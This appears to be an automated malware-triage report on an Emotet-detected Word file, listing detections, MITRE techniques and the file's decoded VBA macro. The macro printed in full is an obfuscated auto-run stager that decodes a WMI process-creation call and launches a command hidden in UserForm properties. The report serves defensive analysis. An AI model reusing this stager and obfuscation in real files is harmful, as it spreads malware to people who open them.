Verdict: MALICIOUS
Risk Score: 272

Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1566.001 Spearphishing Attachment
- T1204.002 Malicious File
The sample contains a VBA macro with a hidden UserForm and obfuscated code, a common technique for Emotet. Heuristics indicate a command stager is present, designed to execute code and likely download a secondary payload. The ClamAV signature also explicitly identifies it as Emotet.
Heuristics (9)

- ClamAV: Doc.Downloader.Emotet-7458423-1 [critical] (CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-7458423-1
- VBA macros detected [medium, 5 related findings] (OLE_VBA_MACROS): Document contains VBA macro code
- VBA UserForm hidden-property command stager [critical] (OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER): VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
  Matched line in script:
    Ggqigemz = Join(Split("qwh_h2bdwqwh_h2bdiqwh_h2bdnqwh_h2bdmqwh_h2bdgmqwh_h2bdtsqwh_h2bd:Wqwh_h2bdinqwh_h2bd3qwh_h2bd2_qwh_h2bd", "qwh_h2bd"), "") + Kyrevpin.Qjniafsohtzkw + "rocess"
- CreateObject call [high] (OLE_VBA_CREATEOBJ): CreateObject call
  Matched line in script:
    Set Hcdtgxkcthnf = CreateObject(Cgsuqbgrdsd)
- GetObject call [high] (OLE_VBA_GETOBJ): GetObject call
  Matched line in script:
    Set Gppbksbstrkuz = GetObject(INSN & Ggqigemz)
- VBA p-code auto-exec with execution tokens [high] (OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro [low] (OLE_VBA_DOCOPEN): Document_Open macro
  Matched line in script:
    Private Sub Document_open()
- Suspicious extracted artifact [info] (EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info] (EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8109 bytes |

SHA-256: e13371cb7926e0cce954e6257119a1bdb1c8a38254c6235468f7edc93492b3e3

Detection (for this artifact):
- ClamAV: No threats found
- Obfuscation or payload: likely. 201 of 308 identifiers look randomly generated (e.g. 'qwh_h2bdwqwh_h2bdiqwh_h2bdnqwh_h2bdmqwh_') — consistent with name-mangling obfuscation.

Script preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "Kyrevpin"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Qjniafsohtzkw, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Dim Gpjxzqvhp
Dim Fbppzklof
For Jbqaevsyqnuod = Jqhopfvk To 0
Yfoouubdlcld = xPI
Ustzgfigymaor = CDbl(3)
Lnmbhmgzrmf = Tan(MyeW5A)
Exsrtcwvaowij = 4 - Bngdbmzpz
Joscmbxkcbuj = (3 - Dwlyptxuzyd)
Glfispbs = Xcvkzpfh
Oxqorkivop = CDbl(6)
Fzryxtbttwwto = Tan(Ixftqzvnivqq)
Next
Dim Khrcephzhfyg
Dim Mqfybxwryui
For Xcvhxjkoe = Jqhopfvk To 0
Tvcnqzcrc = xPI
Afcvqxsjwu = CDbl(3)
Jxlyaxychy = Tan(MyeW5A)
Fuibysrlm = 4 - Pfcsnvvv
Ltqebbte = (3 - Cgwpvork)
Exvwvtxe = Mclctaswx
Hvkzjimwydksk = CDbl(6)
Xtiieotjpzv = Tan(Uwummewblxmkk)
Next
Dim Ecafkuwwyx
Dim Awmjkyoabvneh
For Linexvvf = Jqhopfvk To 0
Zkhuucvq = xPI
Lsyavjyi = CDbl(3)
Wxsulnltede = Tan(MyeW5A)
Fkohfhssnoqpt = 4 - Inxnvbhcrmi
Cmpwtwsqhct = (3 - Xijbesdykqg)
Uyiwuwabpbzuv = Xblelfeytqhq
Rvjfxcuhkhwa = CDbl(6)
Hjhjwlbjf = Tan(Qpzogmgxi)
Next
Hcdtgxkcthnf
End Sub
Attribute VB_Name = "Jsbkraxy"
Attribute VB_Base = "0{830EAA7A-1B71-4277-B4AB-3EF880367575}{DD105773-569D-4B16-B191-C6B4AFEA6D1F}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Lguhsipfaag"
Function Ajueafukppsix()
Dim Dwqunlcvs
Dim Fqclqftqect
For Yyvkiorife = Jqhopfvk To 0
Ttbepqzuql = xPI
Tqosxcdkvf = CDbl(3)
Qrmesgampzw = Tan(MyeW5A)
Mplthtnylqsz = 4 - Cacqnxmnxd
Jlnuuucb = (3 - Sqomiqfaueu)
Lmiioeyrhyfjc = Wxwxaoimcbp
Xjqhonbhll = CDbl(6)
Nvlsicfeoewhw = Tan(Daggyipuyi)
Next
Glvgiorl = Kyrevpin.Qjniafsohtzkw
Dim Rbrxawdabkv
Dim Iemdgitxw
For Ovufakqa = Jqhopfvk To 0
Uzpkrrlriaonn = xPI
Oycgqqvgni = CDbl(3)
Xzruumjn = Tan(MyeW5A)
Toqignvobhfvm = 4 - Ubfzsbbmpor
Ubebereop = (3 - Hlzhywbnfg)
Dnmurcbupw = Zcdrvgzetvsh
Nsmemztqansw = CDbl(6)
Nnulwehwtk = Tan(Gvqivfrxpihkk)
Next
Qcxkvwdlvty = Glvgiorl + Jsbkraxy.Kioicuxkupknt + Jsbkraxy.Ecclogdoh + Jsbkraxy.Gqemglefkb
Dim Yvalekapl
Dim Zaaslpipywaoo
For Vkuxvthytqz = Jqhopfvk To 0
Uuylprti = xPI
Dvudmjxh = CDbl(3)
Rpqvnkfsc = Tan(MyeW5A)
Lkgvexoy = 4 - Fujqcbqvpv
Ykeddyfmbft = (3 - Knhhljjpvmug)
Joxnmtymvq = Qskkzbmyrnin
Zxcykwynvx = CDbl(6)
Hdsyrrgqsqfl = Tan(Uguvfjjzubjx)
Next
Ovrexuwvzbhqc = Qcxkvwdlvty + Jsbkraxy.Zdvhlzvvtqot + Jsbkraxy.Dmgujvpeglnv
Dim Rrqrbdqma
Dim Vjuanewyu
For Lmxwhzacwkh = Jqhopfvk To 0
Koturumlcgitm = xPI
Zsaqcefdt = CDbl(3)
Rlyaxogwpzlch = Tan(MyeW5A)
Bigpduvucekr = 4 - Flzpudancitm
Hnqsqjcwxeb = (3 - Rvwnxfbkommn)
Ogxvqehmpnra = Inunshjrgvwh
Tbdfusoq = CDbl(6)
Lxnfgivwoj = Tan(Ryuoiwac)
Next
Ajueafukppsix = Muclacme + Ovrexuwvzbhqc + Muclacme
Dim Kffoulmvin
Dim Kpbtitdwkknt
For Pmmiryxnpi = Jqhopfvk To 0
Wqmtbddgft = xPI
Knblcarml = CDbl(3)
Aiawqvwztlvwn = Tan(MyeW5A)
Jkpvhvlhxdx = 4 - Pqvbptmlah
Ititpqoblq = (3 - Qabpbcssjlkcq)
Txfjcckyb = Imjkayizkos
Xoucxjgdvj = CDbl(6)
Fhftfbzm = Tan(Gjykltrjsaav)
Next
End Function
Function Hcdtgxkcthnf()
Dim Wbhknmln
Dim Slmggfpbmgz
For Wsuwgnagssq = Jqhopfvk To 0
Ucfsyhagobznl = xPI
Oaqetkksspf = CDbl(3)
Hatwtklnwt = Tan(MyeW5A)
Ckirvjuxkrsc = 4 - Ljjmcsgpynhd
Ebsghmqa = (3 - Xgkdapir)
Ybdjqplnlujsp = Jzmuaclhjpwh
Ifqttbcxips = CDbl(6)
Ohqerqlq = Tan(Xjwntuuuhixdo)
Next
Ggqigemz = Join(Split("qwh_h2bdwqwh_h2bdiqwh_h2bdnqwh_h2bdmqwh_h2bdgmqwh_h2bdtsqwh_h2bd:Wqwh_h2bdinqwh_h2bd3qwh_h2bd2_qwh_h2bd", "qwh_h2bd"), "") + Kyrevpin.Qjniafsohtzkw + "rocess"
Dim Aefucgbnwqx
Dim Xxydeehlhfg
For Gsucpyhqhxvx = Jqhopfvk To 0
Juynlxgvvm = xPI
Vpeszzvjaist = CDbl(3)
Nypacgbryrjru = Tan(MyeW5A)
Kxiiudsmox = 4 - Umabemmj
Ujntdqmji = (3 - Wplklgvvmacg)
Fypfeired = Uazbzfpqgxwor
Rovgsciny = CDbl(6)
Edwdrljlqfvun = Tan(Qyiijylyrcj)
Next
Set Gppbksbstrkuz = GetObject(INSN & Ggqigemz)
Dim Pbsegjhkrgb
Dim Cijmikvjs
For Zbkptafu = Jqhopfvk To 0
Mhsuwzyckruj = xPI
Zrvnhhgwxqeey = CDbl(3)
Rbhtlqaqrlk = Tan(MyeW5A)
Imgpqnpbe = 4 - Unpkbpsbgmt
Qzgybdcxkzo = (3 - Onldomkuzx)
Pbtjqupwtzr = Abopjnayrae
Xggtrbfi = CDbl(6)
Jntfzpqp = Tan(Mnlvepja)
Next
Fixnlgod = Ggqigemz + Jsbkraxy.Gpqvirrnj.ControlTipText + Jsbkraxy.Dymsoqgugp.ControlTipText
Dim Kjvncqehrk
Dim Iveuhckcmyn
For Pcqxnmgvlddj = Jqhopfvk To 0
Gukinytb = xPI
Pcaqizlvr = CDbl(3)
Nnkexhsxsak = Tan(MyeW5A)
Dicpafanzmhlm = 4 - Mrisfqsgae
Bekeesbmaxw = (3 - Rzobctlrfk)
Sejlbblkoyjo = Skcmovng
Efykeywtjlm = CDbl(6)
Byvkkwspatza = Tan(Tvgfmqshwda)
Next
Cgsuqbgrdsd = Fixnlgod + Kyrevpin.Qjniafsohtzkw
Dim Msabphthqor
Dim Atdaqpuvodjk
For Ulvgipvpjxbpu = Jqhopfvk To 0
Zzcnevnav = xPI
Wvyoqqnkzvvh = CDbl(3)
Ykkfzavfnoeh = Tan(MyeW5A)
Bgkzvoszruhlc = 4 - Mersufkduvk
Ijkisojslvmu = (3 - Tqyoymoakmocs)
Qelqaqhj = Naxbifyugqmv
Ldiyxuqwsp = CDbl(6)
Adzjmgawlmq = Tan(Hqhmaqux)
Next
Set Hcdtgxkcthnf = CreateObject(Cgsuqbgrdsd)
Dim Plmhwuwn
Dim Csqbqyvan
For Mnazstuzzxskh = Jqhopfvk To 0
Jsxmtwfr = xPI
Dukmeotg = CDbl(3)
Ymiebboc = Tan(MyeW5A)
Hirppcdbvb = 4 - Avoykmuiyebg
Ktkshdjqvvcux = (3 - Slewcmmpdr)
Zldglnsrk = Ucmjzswp
Xgtxjzlxdhaf = CDbl(6)
Esorhfkabi = Tan(Qcmxgcnpbfjj)
Next
Hcdtgxkcthnf.XSize = False
Dim Nxfylkeoa
Dim Ibwmvphvlft
For Mrcikldpjzkdn = Jqhopfvk To 0
Nlzkjofevr = xPI
Xrnzufgltiveo = CDbl(3)
Ybmiiivh = Tan(MyeW5A)
Ihjhmgrmo = 4 - Vaqxgvsfpvwgn
Jipocjnu = (3 - Wegberaxccbvl)
Cckjmbwbkw = Adpifezjrlele
Kdbowoczhd = CDbl(6)
Wzcwevuztnuvq = Tan(Uqyzfqsmyiim)
Next
Hcdtgxkcthnf.YSize = False
Dim Pkmhalvhnlqkk
Dim Wdyzdawyxzwom
For Ffyaurpyw = Jqhopfvk To 0
Iftwregin = xPI
Qwwtlohewi = CDbl(3)
Gkmkaigeb = Tan(MyeW5A)
Srfbiriebrtpb = 4 - Garrmwpz
Eufagmkzxd = (3 - Nynodromv)
Ybgnjedcs = Exceufipdaz
Sexsxkaqtng = CDbl(6)
Yavubjnx = Tan(Lzxjdfhgybt)
Next
Do While Gppbksbstrkuz.Create(Null & Ajueafukppsix, Mxxglcgaujc, Hcdtgxkcthnf, Qsqixafbihdx)
Loop
Dim Xaynyyjdffvrt
Dim Jlczmqaj
For Guxnkgwugiuql = Jqhopfvk To 0
Yjxgihhspgc = xPI
Lhxrqosdmquzy = CDbl(3)
Mgtzyjohddz = Tan(MyeW5A)
Chgiaziyldzxl = 4 - Tchkkufjnc
Xaunrwtbejm = (3 - Oobdtcmwbnbwp)
Wytgslly = Iaslhkpikvg
Tzuqvmtrc = CDbl(6)
Egpffndpkok = Tan(Ltdlnemxtsag)
Next
End Function